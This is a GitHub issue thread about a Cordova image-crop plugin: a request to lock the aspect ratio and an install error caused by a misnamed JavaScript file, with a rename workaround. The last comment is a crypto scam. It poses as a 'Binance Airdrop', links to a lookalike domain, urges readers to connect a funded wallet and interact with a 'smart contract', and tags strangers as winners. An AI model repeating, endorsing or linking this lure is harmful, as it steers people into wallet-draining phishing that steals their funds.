### ISSUE TITLE
Allow option to lock aspect ratio

### ISSUE THREAD

**Issue by gianpaj** [isathyam/cordova-plugin-icrop#1]
First of all thanks a lot for putting this plugin together!
The current ionic-native one is very basic and simple things like 90-degree rotation should be supported.

If it would be possible to lock the aspect ratio, that would be super cool :)

BTW, i was getting an issue installing this plugin. I think the js file is called `icrop.js` in 
https://github.com/isathyam/cordova-plugin-icrop/blob/master/plugin.xml#L20

but i'm not an expert in cordova plugins.
```
$ cordova plugin add --save cordova-plugin-icrop
Installing "cordova-plugin-icrop" for android
Error during processing of action! Attempting to revert...
Failed to install 'cordova-plugin-icrop': Error: Uh oh!
ENOENT: no such file or directory, open 'app/plugins/cordova-plugin-icrop/www/crop.js'
    at Error (native)
    at Object.fs.openSync (fs.js:641:18)
    at Object.fs.readFileSync (fs.js:509:33)
    at install (app/platforms/android/cordova/lib/pluginHandlers.js:173:36)
    at Object.process (app/platforms/android/cordova/node_modules/cordova-common/src/ActionStack.js:56:25)
    at PluginManager.doOperation (app/platforms/android/cordova/node_modules/cordova-common/src/PluginManager.js:117:20)
    at PluginManager.addPlugin (app/platforms/android/cordova/node_modules/cordova-common/src/PluginManager.js:147:17)
    at app/platforms/android/cordova/Api.js:254:18
    at _fulfilled (app/platforms/android/cordova/node_modules/q/q.js:854:54)
    at self.promiseDispatch.done (app/platforms/android/cordova/node_modules/q/q.js:883:30)
Error: Uh oh!
ENOENT: no such file or directory, open 'app/plugins/cordova-plugin-icrop/www/crop.js'
```

**Comment by iamisathya** [comment]
Thank you for using plugin.
I will check that issue

**Comment by gaurav-vachhani** [comment]
I am also facing the same issue. Any update on this?

**Comment by iamisathya** [comment]
Hi, 

Thank you for using my plugin 

Sorry i was bit busy with my projects..
Will update the code soon.. May be by Tuesday or Wednesday 

Thank you for rising issue..👍

Regards,
iSathya

**Comment by antoniomatiolijr** [comment]
Some news? I think the error is "icrop.js" name, the plugin config xml has wrong path to "crop.js"

**Comment by jamesalanfinnigan** [comment]
After you receive the above error, rename the www/icrop.js to crop.js and rerun the same command.

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @max-block, @aetherwu, @tianshanghong, @TtheBC01, @fogmoon, @zymptomLabs, @wuyongyi
